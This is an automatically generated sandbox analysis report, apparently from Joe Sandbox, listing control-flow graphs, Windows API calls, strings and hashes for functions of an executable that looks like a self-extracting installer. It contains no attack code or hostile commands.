                  control_flow_graph 406 a0bdf5-a0be0d call a0e28c call a0e360 411 a0ca90-a0ca9d 406->411 412 a0be13-a0be3d call a0aa36 406->412 412->411 415 a0be43-a0be48 412->415 416 a0be49-a0be57 415->416 417 a0be58-a0be6d call a0a6c7 416->417 420 a0be6f 417->420 421 a0be71-a0be86 call a017ac 420->421 424 a0be93-a0be96 421->424 425 a0be88-a0be8c 421->425 427 a0ca5c-a0ca87 call a0aa36 424->427 428 a0be9c 424->428 425->421 426 a0be8e 425->426 426->427 427->416 440 a0ca8d-a0ca8f 427->440 430 a0c132-a0c134 428->430 431 a0bea3-a0bea6 428->431 432 a0c074-a0c076 428->432 433 a0c115-a0c117 428->433 430->427 435 a0c13a-a0c141 430->435 431->427 438 a0beac-a0bf06 call a09da4 call 9fb965 call 9fa49d call 9fa5d7 call 9f70bf 431->438 432->427 437 a0c07c-a0c088 432->437 433->427 434 a0c11d-a0c12d SetWindowTextW 433->434 434->427 435->427 439 a0c147-a0c160 435->439 441 a0c08a-a0c09b call a17168 437->441 442 a0c09c-a0c0a1 437->442 494 a0c045-a0c05a call 9fa52a 438->494 444 a0c162 439->444 445 a0c168-a0c176 call a135b3 439->445 440->411 441->442 448 a0c0a3-a0c0a9 442->448 449 a0c0ab-a0c0b6 call a0ab9a 442->449 444->445 445->427 462 a0c17c-a0c185 445->462 454 a0c0bb-a0c0bd 448->454 449->454 456 a0c0c8-a0c0e8 call a135b3 call a135de 454->456 457 a0c0bf-a0c0c6 call a135b3 454->457 483 a0c101-a0c103 456->483 484 a0c0ea-a0c0f1 456->484 457->456 467 a0c187-a0c18b 462->467 468 a0c1ae-a0c1b1 462->468 467->468 473 a0c18d-a0c195 467->473 470 a0c296-a0c2a4 call 9ffe56 468->470 471 a0c1b7-a0c1ba 468->471 485 a0c2a6-a0c2ba call a117cb 470->485 476 a0c1c7-a0c1e2 471->476 477 a0c1bc-a0c1c1 471->477 473->427 474 a0c19b-a0c1a9 call 9ffe56 473->474 474->485 495 a0c1e4-a0c21e 476->495 496 a0c22c-a0c233 476->496 477->470 477->476 483->427 486 a0c109-a0c110 call a135ce 483->486 490 a0c0f3-a0c0f5 484->490 491 a0c0f8-a0c100 call a17168 484->491 505 a0c2c7-a0c318 call 9ffe56 call a0a8d0 GetDlgItem SetWindowTextW SendMessageW call a135e9 485->505 506 a0c2bc-a0c2c0 485->506 486->427 490->491 491->483 512 a0c060-a0c06f call 9fa4b3 494->512 513 a0bf0b-a0bf1f SetFileAttributesW 494->513 529 a0c220 495->529 530 a0c222-a0c224 495->530 498 a0c261-a0c284 call a135b3 * 2 496->498 499 a0c235-a0c24d call a135b3 496->499 498->485 534 a0c286-a0c294 call 9ffe2e 498->534 499->498 516 a0c24f-a0c25c call 9ffe2e 499->516 540 a0c31d-a0c321 505->540 506->505 511 a0c2c2-a0c2c4 506->511 511->505 512->427 518 a0bfc5-a0bfd5 GetFileAttributesW 513->518 519 a0bf25-a0bf58 call 9fb4f7 call 9fb207 call a135b3 513->519 516->498 518->494 527 a0bfd7-a0bfe6 DeleteFileW 518->527 550 a0bf5a-a0bf69 call a135b3 519->550 551 a0bf6b-a0bf79 call 9fb925 519->551 527->494 533 a0bfe8-a0bfeb 527->533 529->530 530->496 537 a0bfef-a0c01b call 9f400a GetFileAttributesW 533->537 534->485 546 a0bfed-a0bfee 537->546 547 a0c01d-a0c033 MoveFileW 537->547 540->427 544 a0c327-a0c33b SendMessageW 540->544 544->427 546->537 547->494 549 a0c035-a0c03f MoveFileExW 547->549 549->494 550->551 556 a0bf7f-a0bfbe call a135b3 call a0f350 550->556 551->512 551->556 556->518
                  APIs
                  • __EH_prolog.LIBCMT ref: 00A0BDFA
                    • Part of subcall function 00A0AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00A0AAFE
                  • SetWindowTextW.USER32(?,?), ref: 00A0C127
                  • _wcsrchr.LIBVCRUNTIME ref: 00A0C2B1
                  • GetDlgItem.USER32(?,00000066), ref: 00A0C2EC
                  • SetWindowTextW.USER32(00000000,?), ref: 00A0C2FC
                  • SendMessageW.USER32(00000000,00000143,00000000,00A3A472), ref: 00A0C30A
                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A0C335
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                  • API String ID: 3564274579-312220925
                  • Opcode ID: f8779be3c41d6c671eee0c37132202bbf5a87b4f76a2baa7dde91aeb9ed52583
                  • Instruction ID: 3dcf2834c673531f1c1349033400ce0971e256d772a525b0d36f470feb97ff67
                  • Opcode Fuzzy Hash: f8779be3c41d6c671eee0c37132202bbf5a87b4f76a2baa7dde91aeb9ed52583
                  • Instruction Fuzzy Hash: 80E19272D0021CAADF25DBA4ED45EEF737DAF08761F0041A6F605E3091EB709A85CB60
                  Function 009FD341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 561 9fd341-9fd378 call a0e28c call a0e360 call a115e8 568 9fd3ab-9fd3b4 call 9ffe56 561->568 569 9fd37a-9fd3a9 GetModuleFileNameW call 9fbc85 call 9ffe2e 561->569 573 9fd3b9-9fd3dd call 9f9619 call 9f99b0 568->573 569->573 580 9fd3e3-9fd3eb 573->580 581 9fd7a0-9fd7a6 call 9f9653 573->581 583 9fd3ed-9fd405 call a03781 * 2 580->583 584 9fd409-9fd438 call a15a90 * 2 580->584 586 9fd7ab-9fd7bb 581->586 594 9fd407 583->594 595 9fd43b-9fd43e 584->595 594->584 596 9fd56c-9fd58f call 9f9d30 call a135d3 595->596 597 9fd444-9fd44a call 9f9e40 595->597 596->581 606 9fd595-9fd5b0 call 9f9bf0 596->606 601 9fd44f-9fd476 call 9f9bf0 597->601 607 9fd47c-9fd484 601->607 608 9fd535-9fd538 601->608 623 9fd5b9-9fd5cc call a135d3 606->623 624 9fd5b2-9fd5b7 606->624 611 9fd4af-9fd4ba 607->611 612 9fd486-9fd48e 607->612 609 9fd53b-9fd55d call 9f9d30 608->609 609->595 628 9fd563-9fd566 609->628 614 9fd4bc-9fd4c8 611->614 615 9fd4e5-9fd4ed 611->615 612->611 617 9fd490-9fd4aa call a15ec0 612->617 614->615 620 9fd4ca-9fd4cf 614->620 621 9fd4ef-9fd4f7 615->621 622 9fd519-9fd51d 615->622 632 9fd4ac 617->632 633 9fd52b-9fd533 617->633 620->615 629 9fd4d1-9fd4e3 call a15808 620->629 621->622 630 9fd4f9-9fd513 call a15ec0 621->630 622->608 631 9fd51f-9fd522 622->631 623->581 639 9fd5d2-9fd5ee call a0137a call a135ce 623->639 625 9fd5f1-9fd5f8 624->625 636 9fd5fc-9fd625 call 9ffdfb call a135d3 625->636 637 9fd5fa 625->637 628->581 628->596 629->615 644 9fd527 629->644 630->581 630->622 631->607 632->611 633->609 651 9fd627-9fd62e call a135ce 636->651 652 9fd633-9fd649 636->652 637->636 639->625 644->633 651->581 654 9fd64f-9fd65d 652->654 655 9fd731-9fd757 call 9fce72 call a135ce * 2 652->655 657 9fd664-9fd669 654->657 694 9fd759-9fd76f call a03781 * 2 655->694 695 9fd771-9fd79d call a15a90 * 2 655->695 659 9fd66f-9fd678 657->659 660 9fd97c-9fd984 657->660 662 9fd67a-9fd67e 659->662 663 9fd684-9fd68b 659->663 664 9fd72b-9fd72e 660->664 665 9fd98a-9fd98e 660->665 662->660 662->663 667 9fd691-9fd6b6 663->667 668 9fd880-9fd891 call 9ffcbf 663->668 664->655 669 9fd9de-9fd9e4 665->669 670 9fd990-9fd996 665->670 675 9fd6b9-9fd6de call a135b3 call a15808 667->675 686 9fd897-9fd8c0 call 9ffe56 call a15885 668->686 687 9fd976-9fd979 668->687 673 9fda0a-9fda2a call 9fce72 669->673 674 9fd9e6-9fd9ec 669->674 676 9fd99c-9fd9a3 670->676 677 9fd722-9fd725 670->677 699 9fda02-9fda05 673->699 674->673 680 9fd9ee-9fd9f4 674->680 713 9fd6f6 675->713 714 9fd6e0-9fd6ea 675->714 683 9fd9ca 676->683 684 9fd9a5-9fd9a8 676->684 677->657 677->664 680->677 689 9fd9fa-9fda01 680->689 688 9fd9cc-9fd9d9 683->688 692 9fd9aa-9fd9ad 684->692 693 9fd9c6-9fd9c8 684->693 686->687 721 9fd8c6-9fd93c call a01596 call 9ffdfb call 9ffdd4 call 9ffdfb call a158d9 686->721 687->660 688->677 689->699 701 9fd9af-9fd9b2 692->701 702 9fd9c2-9fd9c4 692->702 693->688 694->695 695->581 707 9fd9be-9fd9c0 701->707 708 9fd9b4-9fd9b8 701->708 702->688 707->688 708->680 709 9fd9ba-9fd9bc 708->709 709->688 715 9fd6f9-9fd6fd 713->715 714->713 719 9fd6ec-9fd6f4 714->719 715->675 720 9fd6ff-9fd706 715->720 719->715 722 9fd7be-9fd7c1 720->722 723 9fd70c-9fd71a call 9ffdfb 720->723 753 9fd93e-9fd947 721->753 754 9fd94a-9fd95f 721->754 722->668 727 9fd7c7-9fd7ce 722->727 728 9fd71f 723->728 730 9fd7d6-9fd7d7 727->730 731 9fd7d0-9fd7d4 727->731 728->677 730->727 731->730 733 9fd7d9-9fd7e7 731->733 734 9fd7e9-9fd7ec 733->734 735 9fd808-9fd830 call a01596 733->735 737 9fd7ee-9fd803 734->737 738 9fd805 734->738 743 9fd853-9fd85b 735->743 744 9fd832-9fd84e call a135e9 735->744 737->734 737->738 738->735 748 9fd85d 743->748 749 9fd862-9fd87b call 9fdd6b 743->749 744->728 748->749 749->728 753->754 756 9fd960-9fd967 754->756 757 9fd969-9fd96d 756->757 758 9fd973-9fd974 756->758 757->728 757->758 758->756
                  APIs
                  • __EH_prolog.LIBCMT ref: 009FD346
                  • _wcschr.LIBVCRUNTIME ref: 009FD367
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,009FD328,?), ref: 009FD382
                  • __fprintf_l.LIBCMT ref: 009FD873
                    • Part of subcall function 00A0137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,009FB652,00000000,?,?,?,0001042A), ref: 00A01396
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                  • API String ID: 4184910265-980926923
                  • Opcode ID: d9100b006c1e48611f50050a07f5030fc845b9319f2fa5a8693f2fb152bcb9de
                  • Instruction ID: 8e3c511e957956f934e09d9bc5f4af95df25fbd539cb7e6070de57e58c4e5455
                  • Opcode Fuzzy Hash: d9100b006c1e48611f50050a07f5030fc845b9319f2fa5a8693f2fb152bcb9de
                  • Instruction Fuzzy Hash: 8712CFB190121D9ADF24EFA4DC81BFEB7BAEF45714F104569F605A7191EB709A80CB20
                  Function 00A0CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00A0AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A0AC85
                    • Part of subcall function 00A0AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A0AC96
                    • Part of subcall function 00A0AC74: IsDialogMessageW.USER32(0001042A,?), ref: 00A0ACAA
                    • Part of subcall function 00A0AC74: TranslateMessage.USER32(?), ref: 00A0ACB8
                    • Part of subcall function 00A0AC74: DispatchMessageW.USER32(?), ref: 00A0ACC2
                  • GetDlgItem.USER32(00000068,00A4ECB0), ref: 00A0CB6E
                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00A0A632,00000001,?,?,00A0AECB,00A24F88,00A4ECB0), ref: 00A0CB96
                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A0CBA1
                  • SendMessageW.USER32(00000000,000000C2,00000000,00A235B4), ref: 00A0CBAF
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A0CBC5
                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A0CBDF
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A0CC23
                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A0CC31
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A0CC40
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A0CC67
                  • SendMessageW.USER32(00000000,000000C2,00000000,00A2431C), ref: 00A0CC76
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                  • String ID: \
                  • API String ID: 3569833718-2967466578
                  • Opcode ID: 1ff56095e830613772937846e49422ff065884282c5e72421d0cf2c1f3f384b8
                  • Instruction ID: 7143269823ff4e22903036caa149f43283d05233ef1eedfdf41c43c3031c15e7
                  • Opcode Fuzzy Hash: 1ff56095e830613772937846e49422ff065884282c5e72421d0cf2c1f3f384b8
                  • Instruction Fuzzy Hash: 9E31DE72186745ABE301DF60EC4AFAB7EACFB82725F000608F651961D1DB64590AC7B6
                  Function 00A0CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 796 a0ce22-a0ce3a call a0e360 799 a0ce40-a0ce4c call a135b3 796->799 800 a0d08b-a0d093 796->800 799->800 803 a0ce52-a0ce7a call a0f350 799->803 806 a0ce84-a0ce91 803->806 807 a0ce7c 803->807 808 a0ce93 806->808 809 a0ce95-a0ce9e 806->809 807->806 808->809 810 a0cea0-a0cea2 809->810 811 a0ced6 809->811 812 a0ceaa-a0cead 810->812 813 a0ceda-a0cedd 811->813 814 a0ceb3-a0cebb 812->814 815 a0d03c-a0d041 812->815 816 a0cee4-a0cee6 813->816 817 a0cedf-a0cee2 813->817 818 a0cec1-a0cec7 814->818 819 a0d055-a0d05d 814->819 820 a0d043 815->820 821 a0d036-a0d03a 815->821 822 a0cef9-a0cf0e call 9fb493 816->822 823 a0cee8-a0ceef 816->823 817->816 817->822 818->819 824 a0cecd-a0ced4 818->824 826 a0d065-a0d06d 819->826 827 a0d05f-a0d061 819->827 825 a0d048-a0d04c 820->825 821->815 821->825 831 a0cf10-a0cf1d call a017ac 822->831 832 a0cf27-a0cf32 call 9fa180 822->832 823->822 828 a0cef1 823->828 824->811 824->812 825->819 826->813 827->826 828->822 831->832 837 a0cf1f 831->837 838 a0cf34-a0cf4b call 9fb239 832->838 839 a0cf4f-a0cf5c ShellExecuteExW 832->839 837->832 838->839 841 a0cf62-a0cf6f 839->841 842 a0d08a 839->842 844 a0cf71-a0cf78 841->844 845 a0cf82-a0cf84 841->845 842->800 844->845 846 a0cf7a-a0cf80 844->846 847 a0cf86-a0cf8f 845->847 848 a0cf9b-a0cfba call a0d2e6 845->848 846->845 849 a0cff1-a0cffd CloseHandle 846->849 847->848 856 a0cf91-a0cf99 ShowWindow 847->856 848->849 864 a0cfbc-a0cfc4 848->864 851 a0d00e-a0d01c 849->851 852 a0cfff-a0d00c call a017ac 849->852 854 a0d079-a0d07b 851->854 855 a0d01e-a0d020 851->855 852->851 866 a0d072 852->866 854->842 861 a0d07d-a0d07f 854->861 855->854 859 a0d022-a0d028 855->859 856->848 859->854 863 a0d02a-a0d034 859->863 861->842 865 a0d081-a0d084 ShowWindow 861->865 863->854 864->849 867 a0cfc6-a0cfd7 GetExitCodeProcess 864->867 865->842 866->854 867->849 868 a0cfd9-a0cfe3 867->868 869 a0cfe5 868->869 870 a0cfea 868->870 869->870 870->849
                  APIs
                  • ShellExecuteExW.SHELL32(?), ref: 00A0CF54
                  • ShowWindow.USER32(?,00000000), ref: 00A0CF93
                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00A0CFCF
                  • CloseHandle.KERNEL32(?), ref: 00A0CFF5
                  • ShowWindow.USER32(?,00000001), ref: 00A0D084
                    • Part of subcall function 00A017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,009FBB05,00000000,.exe,?,?,00000800,?,?,00A085DF,?), ref: 00A017C2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                  • String ID: $.exe$.inf
                  • API String ID: 3686203788-2452507128
                  • Opcode ID: 35de1399d527b9129f6728054feda324d5876388c59fe744ab13a7e7744dad7b
                  • Instruction ID: a575cc0728bc4d22290ab7ffabd6a5ace4f342477c760796523159c46326eb29
                  • Opcode Fuzzy Hash: 35de1399d527b9129f6728054feda324d5876388c59fe744ab13a7e7744dad7b
                  • Instruction Fuzzy Hash: DB61F471504389AADB31DFA4F8406ABBBF9BF81310F044919F5C6972D1D7B18986CB92
                  Function 00A1A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 871 a1a058-a1a071 872 a1a073-a1a083 call a1e6ed 871->872 873 a1a087-a1a08c 871->873 872->873 883 a1a085 872->883 874 a1a099-a1a0bd MultiByteToWideChar 873->874 875 a1a08e-a1a096 873->875 877 a1a250-a1a263 call a0ec4a 874->877 878 a1a0c3-a1a0cf 874->878 875->874 880 a1a0d1-a1a0e2 878->880 881 a1a123 878->881 884 a1a101-a1a112 call a18518 880->884 885 a1a0e4-a1a0f3 call a21a30 880->885 887 a1a125-a1a127 881->887 883->873 888 a1a245 884->888 899 a1a118 884->899 885->888 898 a1a0f9-a1a0ff 885->898 887->888 889 a1a12d-a1a140 MultiByteToWideChar 887->889 893 a1a247-a1a24e call a1a2c0 888->893 889->888 892 a1a146-a1a158 call a1a72c 889->892 900 a1a15d-a1a161 892->900 893->877 902 a1a11e-a1a121 898->902 899->902 900->888 903 a1a167-a1a16e 900->903 902->887 904 a1a170-a1a175 903->904 905 a1a1a8-a1a1b4 903->905 904->893 906 a1a17b-a1a17d 904->906 907 a1a200 905->907 908 a1a1b6-a1a1c7 905->908 906->888 909 a1a183-a1a19d call a1a72c 906->909 910 a1a202-a1a204 907->910 911 a1a1e2-a1a1f3 call a18518 908->911 912 a1a1c9-a1a1d8 call a21a30 908->912 909->893 926 a1a1a3 909->926 915 a1a206-a1a21f call a1a72c 910->915 916 a1a23e-a1a244 call a1a2c0 910->916 911->916 925 a1a1f5 911->925 912->916 924 a1a1da-a1a1e0 912->924 915->916 929 a1a221-a1a228 915->929 916->888 928 a1a1fb-a1a1fe 924->928 925->928 926->888 928->910 930 a1a264-a1a26a 929->930 931 a1a22a-a1a22b 929->931 932 a1a22c-a1a23c WideCharToMultiByte 930->932 931->932 932->916 933 a1a26c-a1a273 call a1a2c0 932->933 933->893
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A14E35,00A14E35,?,?,?,00A1A2A9,00000001,00000001,3FE85006), ref: 00A1A0B2
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A1A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00A1A138
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A1A232
                  • __freea.LIBCMT ref: 00A1A23F
                    • Part of subcall function 00A18518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A1C13D,00000000,?,00A167E2,?,00000008,?,00A189AD,?,?,?), ref: 00A1854A
                  • __freea.LIBCMT ref: 00A1A248
                  • __freea.LIBCMT ref: 00A1A26D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  • String ID:
                  • API String ID: 1414292761-0
                  • Opcode ID: 8789f2cc0864f9c64454791fdabd9a2ace282890f5d10fd437f254fc675e75c1
                  • Instruction ID: 8c5ed482fd2198356bf339616d6025e87ad0969c7e4227f187f61a0175d995a7
                  • Opcode Fuzzy Hash: 8789f2cc0864f9c64454791fdabd9a2ace282890f5d10fd437f254fc675e75c1
                  • Instruction Fuzzy Hash: 1B51D172612216AFEB258F74CD41EFB77AAEB64760F144229FC05D6150EB35DCC0C6A2
                  Function 00A0A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00A00085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A000A0
                    • Part of subcall function 00A00085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009FEB86,Crypt32.dll,00000000,009FEC0A,?,?,009FEBEC,?,?,?), ref: 00A000C2
                  • OleInitialize.OLE32(00000000), ref: 00A0A34E
                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A0A385
                  • SHGetMalloc.SHELL32(00A38430), ref: 00A0A38F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                  • String ID: riched20.dll$3To
                  • API String ID: 3498096277-2168385784
                  • Opcode ID: 0850c3ce64d1f98aa489d3389e9e50d4a63f3eacc8758ba68c96545bda09815e
                  • Instruction ID: 63d17c6d7db2b4260bb696d55564d6e5904f44593a26834f10cc09712a551fa3
                  • Opcode Fuzzy Hash: 0850c3ce64d1f98aa489d3389e9e50d4a63f3eacc8758ba68c96545bda09815e
                  • Instruction Fuzzy Hash: 41F0ECB190020DABCB10EF999949AEFFBFCFB95701F00455AF854A2240DBB456058BA1
                  Function 009F99B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 940 9f99b0-9f99d1 call a0e360 943 9f99dc 940->943 944 9f99d3-9f99d6 940->944 946 9f99de-9f99fb 943->946 944->943 945 9f99d8-9f99da 944->945 945->946 947 9f99fd 946->947 948 9f9a03-9f9a0d 946->948 947->948 949 9f9a0f 948->949 950 9f9a12-9f9a31 call 9f70bf 948->950 949->950 953 9f9a39-9f9a57 CreateFileW 950->953 954 9f9a33 950->954 955 9f9abb-9f9ac0 953->955 956 9f9a59-9f9a7b GetLastError call 9fb66c 953->956 954->953 958 9f9ac2-9f9ac5 955->958 959 9f9ae1-9f9af5 955->959 965 9f9a7d-9f9a9f CreateFileW GetLastError 956->965 966 9f9aaa-9f9aaf 956->966 958->959 963 9f9ac7-9f9adb SetFileTime 958->963 960 9f9af7-9f9b0f call 9ffe56 959->960 961 9f9b13-9f9b1e 959->961 960->961 963->959 968 9f9aa5-9f9aa8 965->968 969 9f9aa1 965->969 966->955 970 9f9ab1 966->970 968->955 968->966 969->968 970->955
                  APIs
                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,009F78AD,?,00000005,?,00000011), ref: 009F9A4C
                  • GetLastError.KERNEL32(?,?,009F78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009F9A59
                  • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,009F78AD,?,00000005,?), ref: 009F9A8E
                  • GetLastError.KERNEL32(?,?,009F78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009F9A96
                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,009F78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009F9ADB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
